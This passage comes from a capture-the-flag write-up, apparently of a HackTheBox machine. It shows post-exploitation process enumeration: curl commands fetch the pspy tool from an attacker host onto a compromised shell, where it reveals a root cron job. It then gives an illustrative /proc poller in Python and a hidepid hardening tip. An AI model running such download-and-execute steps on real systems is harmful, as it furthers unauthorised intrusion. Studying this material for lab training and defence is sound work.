PSPY
Since I was unable to enumerate the processes on the system in the usual manner, I will get PSPY running to capture all of the system's processes as they are spawned.
sh-4.2$ curl -s http://10.10.14.2/pspy64 -o /var/tmp/pspy64 ; chmod 755 /var/tmp/pspy64
Delivery complete
sh-4.2$ ./pspy64
sh: ./pspy64: Permission denied
I am unable to execute PSPY as the apache user.
Since I made a lateral movement to the brucetherealadmin user and elevated the shell session, I will re-attempt it as the brucetherealadmin user.
[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/pspy64 -o /home/brucetherealadmin/pspy64 ; chmod 755 /home/brucetherealadmin/pspy64
[brucetherealadmin@armageddon ~]$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
[pspy ASCII-art banner]
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
This time, I am able to execute PSPY as the brucetherealadmin user.
There is a root cronjob process that executes a Bash script located at /root/cleanup.sh.
I am unable to read the Bash script, as it is located under the home directory of the root user.
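The reason an unprivileged user can still see what root's cron job runs is that pspy does nothing more than poll /proc: on a default mount, every /proc/PID/status and /proc/PID/cmdline is world-readable, so a new root process and its full command line show up to anyone who diffs two snapshots. The following is an added illustration of that polling technique, written for this write-up and not taken from pspy's own source. It snapshots a /proc-style directory, reports processes that appeared between two polls, and includes a constructed fake /proc (with a sample root entry mirroring the cleanup.sh job above) so it can run offline; the UID 48 for apache and the PIDs are constructed sample values.

```python
"""Minimal /proc poller in the spirit of pspy (added example, not pspy's code)."""
import os
import tempfile
import time


def parse_status(text):
    """Extract the real UID and the parent PID from /proc/<pid>/status text."""
    uid = ppid = None
    for line in text.splitlines():
        if line.startswith("Uid:"):
            uid = int(line.split()[1])  # first field after 'Uid:' is the real uid
        elif line.startswith("PPid:"):
            ppid = int(line.split()[1])
    return uid, ppid


def read_cmdline(raw):
    """/proc/<pid>/cmdline is NUL-separated; render it as a shell-like string."""
    parts = [p for p in raw.split(b"\0") if p]
    return " ".join(p.decode("utf-8", "replace") for p in parts)


def snapshot(proc_root="/proc"):
    """Return {pid: (uid, ppid, cmdline)} for every numeric entry under proc_root."""
    procs = {}
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "status")) as f:
                uid, ppid = parse_status(f.read())
            with open(os.path.join(proc_root, name, "cmdline"), "rb") as f:
                cmd = read_cmdline(f.read())
        except OSError:
            continue  # process exited mid-read, or hidepid= hides it from us
        procs[int(name)] = (uid, ppid, cmd)
    return procs


def new_processes(old, new):
    """Processes present in the new snapshot but not in the old one."""
    return {pid: info for pid, info in new.items() if pid not in old}


def watch(proc_root="/proc", interval=0.1, rounds=None):
    """Poll forever (or for `rounds` polls) and print each newly seen process."""
    seen = snapshot(proc_root)
    done = 0
    while rounds is None or done < rounds:
        time.sleep(interval)
        current = snapshot(proc_root)
        for pid, (uid, ppid, cmd) in sorted(new_processes(seen, current).items()):
            print(f"UID={uid:<5} PID={pid:<7} PPID={ppid:<7} | {cmd}")
        seen = current
        done += 1


def build_fake_proc(root, entries):
    """Write a constructed /proc look-alike: {pid: (uid, ppid, cmdline)}."""
    for pid, (uid, ppid, cmd) in entries.items():
        d = os.path.join(root, str(pid))
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, "status"), "w") as f:
            f.write(f"Name:\t{cmd.split()[0]}\nPPid:\t{ppid}\nUid:\t{uid}\t{uid}\t{uid}\t{uid}\n")
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(b"\0".join(p.encode() for p in cmd.split()) + b"\0")


def demo():
    """Constructed scenario: a root cron child appears between two polls."""
    root = tempfile.mkdtemp(prefix="fakeproc_")
    baseline = {
        1: (0, 0, "/usr/lib/systemd/systemd"),
        1234: (48, 1, "/usr/sbin/httpd -DFOREGROUND"),  # 48 = apache on CentOS (sample)
    }
    build_fake_proc(root, baseline)
    before = snapshot(root)
    build_fake_proc(root, {4242: (0, 1, "/bin/bash /root/cleanup.sh")})  # sample root job
    after = snapshot(root)
    return new_processes(before, after)


if __name__ == "__main__":
    for pid, (uid, ppid, cmd) in demo().items():
        print(f"UID={uid:<5} PID={pid:<7} PPID={ppid:<7} | {cmd}")
```

Running `demo()` shows the single new entry for the root-owned cleanup script, which is exactly the kind of line pspy surfaced here. The defensive takeaway is that this visibility is a mount option, not a privilege: remounting /proc with `hidepid=2` (`mount -o remount,hidepid=2 /proc`) restricts each user to their own processes, after which `snapshot()` skips other users' PIDs via the `OSError` branch above and a cron job's command line is no longer exposed to an unprivileged shell.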